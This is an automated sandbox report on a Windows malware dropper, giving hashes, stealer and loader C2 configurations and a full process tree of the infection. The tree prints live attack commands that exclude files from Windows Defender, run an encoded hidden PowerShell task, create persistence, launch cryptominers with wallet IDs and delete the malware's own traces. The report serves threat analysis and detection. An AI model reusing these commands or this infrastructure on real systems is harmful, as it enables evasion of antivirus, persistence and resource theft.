Analysis

  • max time kernel
    126s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    10-03-2022 03:12

General

  • Target

    6af1dde65e7476f3cc2035d9d7767d46b3ae79e5ebf1439e95b923c9337eb3b4.exe

  • Size

    3.1MB

  • MD5

    d1de65f4bc45460ca0faa55137d21b4d

  • SHA1

    3b6bd5603aacb229eeb3d3de24cbabc28ba5f6e8

  • SHA256

    6af1dde65e7476f3cc2035d9d7767d46b3ae79e5ebf1439e95b923c9337eb3b4

  • SHA512

    ce5d6e5ed19ee2cc442dec813b654ee649f8d2cdc7fcb99bf47c3eaf339d5e7eb8999137c0ab5468eec241d2cb1be117b189aa03330e063d3a9de9949af83ee6

Malware Config

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

dadad123

C2

86.107.197.196:63065

Attributes
  • auth_value

    dd4834614a3ac04a7b90791c224626a2

Extracted

Family

redline

Botnet

newall

C2

deyneyab.xyz:80

Attributes
  • auth_value

    25db96cfa370a37f57d1a769f3900122

Extracted

Family

redline

Botnet

Lyla2

C2

bonezarisor.xyz:80

Attributes
  • auth_value

    de2a98abc502b86b809fbc366af9256a

Signatures

  • DcRat 11 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 7 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 21 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE DCRAT Activity (GET)

    suricata: ET MALWARE DCRAT Activity (GET)

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 43 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 21 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 19 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6af1dde65e7476f3cc2035d9d7767d46b3ae79e5ebf1439e95b923c9337eb3b4.exe
    "C:\Users\Admin\AppData\Local\Temp\6af1dde65e7476f3cc2035d9d7767d46b3ae79e5ebf1439e95b923c9337eb3b4.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3680
    • C:\Users\Admin\AppData\Local\Temp\7zS06E4390D\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS06E4390D\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1124
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c arnatic_7.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2292
        • C:\Users\Admin\AppData\Local\Temp\7zS06E4390D\arnatic_7.exe
          arnatic_7.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1772
          • C:\Users\Admin\AppData\Local\Temp\7zS06E4390D\arnatic_7.exe
            C:\Users\Admin\AppData\Local\Temp\7zS06E4390D\arnatic_7.exe
            5⤵
            • Executes dropped EXE
            PID:1068
          • C:\Users\Admin\AppData\Local\Temp\7zS06E4390D\arnatic_7.exe
            C:\Users\Admin\AppData\Local\Temp\7zS06E4390D\arnatic_7.exe
            5⤵
            • Executes dropped EXE
            PID:1944
          • C:\Users\Admin\AppData\Local\Temp\7zS06E4390D\arnatic_7.exe
            C:\Users\Admin\AppData\Local\Temp\7zS06E4390D\arnatic_7.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1156
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c arnatic_6.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1172
        • C:\Users\Admin\AppData\Local\Temp\7zS06E4390D\arnatic_6.exe
          arnatic_6.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          PID:1428
          • C:\Users\Admin\Documents\9cE6R1RgfIWq5UacqHsliRhV.exe
            "C:\Users\Admin\Documents\9cE6R1RgfIWq5UacqHsliRhV.exe"
            5⤵
            • Executes dropped EXE
            PID:176
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 176 -s 468
              6⤵
              • Program crash
              PID:4172
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 176 -s 476
              6⤵
              • Program crash
              PID:4584
          • C:\Users\Admin\Documents\tRxpHS_QrbjtGI13ch9MqFjk.exe
            "C:\Users\Admin\Documents\tRxpHS_QrbjtGI13ch9MqFjk.exe"
            5⤵
            • DcRat
            • Executes dropped EXE
            • Checks computer location settings
            • Adds Run key to start application
            • Drops file in System32 directory
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1860
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7tcwCRqRxO.bat"
              6⤵
                PID:4800
                • C:\Windows\SysWOW64\w32tm.exe
                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                  7⤵
                    PID:3024
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      8⤵
                        PID:1096
                    • C:\Windows\SysWOW64\uicom\conhost.exe
                      "C:\Windows\System32\uicom\conhost.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of SetWindowsHookEx
                      PID:2944
                • C:\Users\Admin\Documents\Ymor9mnRXRClIqTz1jPR8VNF.exe
                  "C:\Users\Admin\Documents\Ymor9mnRXRClIqTz1jPR8VNF.exe"
                  5⤵
                    PID:1728
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 432
                      6⤵
                      • Program crash
                      PID:4316
                  • C:\Users\Admin\Documents\HEqH5fJcG9m8NLc8Xt1qSfLM.exe
                    "C:\Users\Admin\Documents\HEqH5fJcG9m8NLc8Xt1qSfLM.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:1328
                  • C:\Users\Admin\Documents\RFBAwXhPRRr93NNsWfPzQy3Y.exe
                    "C:\Users\Admin\Documents\RFBAwXhPRRr93NNsWfPzQy3Y.exe"
                    5⤵
                      PID:3912
                      • C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe
                        "C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe"
                        6⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of SetThreadContext
                        PID:4576
                        • C:\Windows\bfsvc.exe
                          C:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user UQBoMIYmX6zYTKyRLaph1PjCMfxSLWTbiAw_qqTHLnbMhzWF
                          7⤵
                            PID:116
                          • C:\Windows\notepad.exe
                            C:\Windows\notepad.exe --coin=XMR -o xmr-eu1.nanopool.org:14444 -u 44W9eLcymm66Eie5AyD11jYW1DaJ4GTHzZEu1QELPGS3U9vKtWEyUCaCFwhn4af8zjeQ2MWeuLgCVDTjAjiGUbyYAtQBvC1 -p 10k instllov
                            7⤵
                              PID:3372
                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -u -p 3372 -s 416
                                8⤵
                                • Program crash
                                PID:4580
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "new" "ton"
                              7⤵
                                PID:4108
                                • C:\Windows\system32\WerFault.exe
                                  C:\Windows\system32\WerFault.exe -u -p 4108 -s 232
                                  8⤵
                                  • Program crash
                                  PID:4708
                            • C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\jOW1D87fZN3R3jFe02zd.exe
                              "C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\jOW1D87fZN3R3jFe02zd.exe"
                              6⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious use of SetThreadContext
                              PID:4808
                              • C:\Windows\bfsvc.exe
                                C:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user UQBoMIYmX6zYTKyRLaph1PjCMfxSLWTbiAw_qqTHLnbMhzWF
                                7⤵
                                  PID:1456
                                • C:\Windows\notepad.exe
                                  C:\Windows\notepad.exe --coin=XMR -o xmr-eu1.nanopool.org:14444 -u 44W9eLcymm66Eie5AyD11jYW1DaJ4GTHzZEu1QELPGS3U9vKtWEyUCaCFwhn4af8zjeQ2MWeuLgCVDTjAjiGUbyYAtQBvC1 -p 10k instllov
                                  7⤵
                                  • Executes dropped EXE
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2512
                                  • C:\Windows\system32\WerFault.exe
                                    C:\Windows\system32\WerFault.exe -u -p 2512 -s 140
                                    8⤵
                                    • Program crash
                                    PID:4244
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "new" "ton"
                                  7⤵
                                    PID:5036
                              • C:\Users\Admin\Documents\zLdAcCYurc6P575XM932Mf6p.exe
                                "C:\Users\Admin\Documents\zLdAcCYurc6P575XM932Mf6p.exe"
                                5⤵
                                • Executes dropped EXE
                                PID:4404
                                • C:\Users\Admin\AppData\Local\Temp\7zS19BA.tmp\Install.exe
                                  .\Install.exe
                                  6⤵
                                  • Executes dropped EXE
                                  PID:4500
                                  • C:\Users\Admin\AppData\Local\Temp\7zS331E.tmp\Install.exe
                                    .\Install.exe /S /site_id "525403"
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks computer location settings
                                    • Drops file in System32 directory
                                    • Enumerates system info in registry
                                    PID:2484
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                      8⤵
                                        PID:4604
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                          9⤵
                                            PID:4260
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                              10⤵
                                                PID:4772
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                10⤵
                                                  PID:4200
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                              8⤵
                                                PID:4284
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                  9⤵
                                                    PID:4424
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                      10⤵
                                                        PID:3036
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                        10⤵
                                                          PID:4192
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "gNMZALaYz" /SC once /ST 15:28:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                      8⤵
                                                      • DcRat
                                                      • Creates scheduled task(s)
                                                      PID:4812
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /run /I /tn "gNMZALaYz"
                                                      8⤵
                                                        PID:4656
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /DELETE /F /TN "gNMZALaYz"
                                                        8⤵
                                                          PID:5116
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 23:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\lSQxKEZ.exe\" j6 /site_id 525403 /S" /V1 /F
                                                          8⤵
                                                          • DcRat
                                                          • Creates scheduled task(s)
                                                          PID:4896
                                                  • C:\Users\Admin\Documents\KkEpTXySp2GcgL4Ktq2Wdky5.exe
                                                    "C:\Users\Admin\Documents\KkEpTXySp2GcgL4Ktq2Wdky5.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Checks computer location settings
                                                    PID:4336
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 624
                                                      6⤵
                                                      • Program crash
                                                      PID:5028
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 632
                                                      6⤵
                                                      • Program crash
                                                      PID:5040
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 760
                                                      6⤵
                                                      • Program crash
                                                      PID:2392
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 800
                                                      6⤵
                                                      • Program crash
                                                      PID:3568
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 1248
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Program crash
                                                      • Checks processor information in registry
                                                      PID:3912
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 1244
                                                      6⤵
                                                      • Program crash
                                                      PID:1952
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 1252
                                                      6⤵
                                                      • Program crash
                                                      PID:4312
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "KkEpTXySp2GcgL4Ktq2Wdky5.exe" /f & erase "C:\Users\Admin\Documents\KkEpTXySp2GcgL4Ktq2Wdky5.exe" & exit
                                                      6⤵
                                                        PID:3792
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /im "KkEpTXySp2GcgL4Ktq2Wdky5.exe" /f
                                                          7⤵
                                                          • Kills process with taskkill
                                                          PID:4884
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 1360
                                                        6⤵
                                                        • Program crash
                                                        PID:4768
                                                    • C:\Users\Admin\Documents\fpLYcTDwlE3sClcI62R6XxI4.exe
                                                      "C:\Users\Admin\Documents\fpLYcTDwlE3sClcI62R6XxI4.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:4328
                                                    • C:\Users\Admin\Documents\8LXM0m0Wvz1BgGChgeuPRCqu.exe
                                                      "C:\Users\Admin\Documents\8LXM0m0Wvz1BgGChgeuPRCqu.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      • Loads dropped DLL
                                                      • Checks processor information in registry
                                                      PID:4308
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 8LXM0m0Wvz1BgGChgeuPRCqu.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\8LXM0m0Wvz1BgGChgeuPRCqu.exe" & del C:\ProgramData\*.dll & exit
                                                        6⤵
                                                          PID:4100
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /im 8LXM0m0Wvz1BgGChgeuPRCqu.exe /f
                                                            7⤵
                                                            • Kills process with taskkill
                                                            PID:4496
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout /t 6
                                                            7⤵
                                                            • Delays execution with timeout.exe
                                                            PID:2576
                                                      • C:\Users\Admin\Documents\unNzCTlWPMj4ONP9rcd5vp7P.exe
                                                        "C:\Users\Admin\Documents\unNzCTlWPMj4ONP9rcd5vp7P.exe"
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:4300
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 432
                                                          6⤵
                                                          • Program crash
                                                          PID:5036
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 440
                                                          6⤵
                                                          • Program crash
                                                          PID:60
                                                      • C:\Users\Admin\Documents\kONFU5scb1u6G9EPBNtLjiUz.exe
                                                        "C:\Users\Admin\Documents\kONFU5scb1u6G9EPBNtLjiUz.exe"
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Checks computer location settings
                                                        PID:4276
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                          6⤵
                                                            PID:4840
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd
                                                              7⤵
                                                                PID:2256
                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                  tasklist /FI "imagename eq BullGuardCore.exe"
                                                                  8⤵
                                                                  • Enumerates processes with tasklist
                                                                  PID:4656
                                                                • C:\Windows\SysWOW64\find.exe
                                                                  find /I /N "bullguardcore.exe"
                                                                  8⤵
                                                                    PID:4600
                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                    tasklist /FI "imagename eq PSUAService.exe"
                                                                    8⤵
                                                                    • Enumerates processes with tasklist
                                                                    PID:2704
                                                                  • C:\Windows\SysWOW64\find.exe
                                                                    find /I /N "psuaservice.exe"
                                                                    8⤵
                                                                      PID:2996
                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                      findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                                                      8⤵
                                                                        PID:4536
                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                                        Accostarmi.exe.pif N
                                                                        8⤵
                                                                          PID:4588
                                                                  • C:\Users\Admin\Documents\LaRJBuXMWtQp1jSOpdIGP7Ts.exe
                                                                    "C:\Users\Admin\Documents\LaRJBuXMWtQp1jSOpdIGP7Ts.exe"
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:4148
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\LaRJBuXMWtQp1jSOpdIGP7Ts.exe
                                                                      6⤵
                                                                        PID:4788
                                                                        • C:\Windows\system32\choice.exe
                                                                          choice /C Y /N /D Y /T 0
                                                                          7⤵
                                                                            PID:4676
                                                                      • C:\Users\Admin\Documents\RhhPXO6GhQZN5DPCnUI9j2EP.exe
                                                                        "C:\Users\Admin\Documents\RhhPXO6GhQZN5DPCnUI9j2EP.exe"
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:4140
                                                                      • C:\Users\Admin\Documents\KYqQ3DPviblANMHOHT2V6etd.exe
                                                                        "C:\Users\Admin\Documents\KYqQ3DPviblANMHOHT2V6etd.exe"
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:4104
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 428
                                                                          6⤵
                                                                          • Program crash
                                                                          PID:4272
                                                                      • C:\Users\Admin\Documents\fyZF6fPD4XUUrhYcUx9XVaMn.exe
                                                                        "C:\Users\Admin\Documents\fyZF6fPD4XUUrhYcUx9XVaMn.exe"
                                                                        5⤵
                                                                          PID:2512
                                                                        • C:\Users\Admin\Documents\P_MGBoD0mVOTs7AUm7uC3ujx.exe
                                                                          "C:\Users\Admin\Documents\P_MGBoD0mVOTs7AUm7uC3ujx.exe"
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Checks computer location settings
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4632
                                                                          • C:\Users\Admin\AppData\Local\Temp\7f34008f-4bf8-45e8-9f0f-c8881735c672.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\7f34008f-4bf8-45e8-9f0f-c8881735c672.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Checks processor information in registry
                                                                            PID:4816
                                                                        • C:\Users\Admin\Documents\0CvBnVdJwvRAjQMLwv60GLRG.exe
                                                                          "C:\Users\Admin\Documents\0CvBnVdJwvRAjQMLwv60GLRG.exe"
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:4728
                                                                          • C:\Users\Admin\AppData\Local\Temp\88A50.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\88A50.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:5116
                                                                          • C:\Users\Admin\AppData\Local\Temp\FL76E.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\FL76E.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:4520
                                                                          • C:\Users\Admin\AppData\Local\Temp\CFJD3.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\CFJD3.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:3452
                                                                          • C:\Users\Admin\AppData\Local\Temp\J59EH.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\J59EH.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Adds Run key to start application
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:2348
                                                                          • C:\Users\Admin\AppData\Local\Temp\G75E5.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\G75E5.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Checks computer location settings
                                                                            • Modifies registry class
                                                                            PID:2308
                                                                            • C:\Windows\SysWOW64\control.exe
                                                                              "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
                                                                              7⤵
                                                                                PID:2140
                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                  "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
                                                                                  8⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:2068
                                                                                  • C:\Windows\system32\RunDll32.exe
                                                                                    C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
                                                                                    9⤵
                                                                                      PID:4088
                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
                                                                                        10⤵
                                                                                          PID:4192
                                                                                • C:\Users\Admin\AppData\Local\Temp\D8GFABK4LABF8L9.exe
                                                                                  https://iplogger.org/1nChi7
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:2304
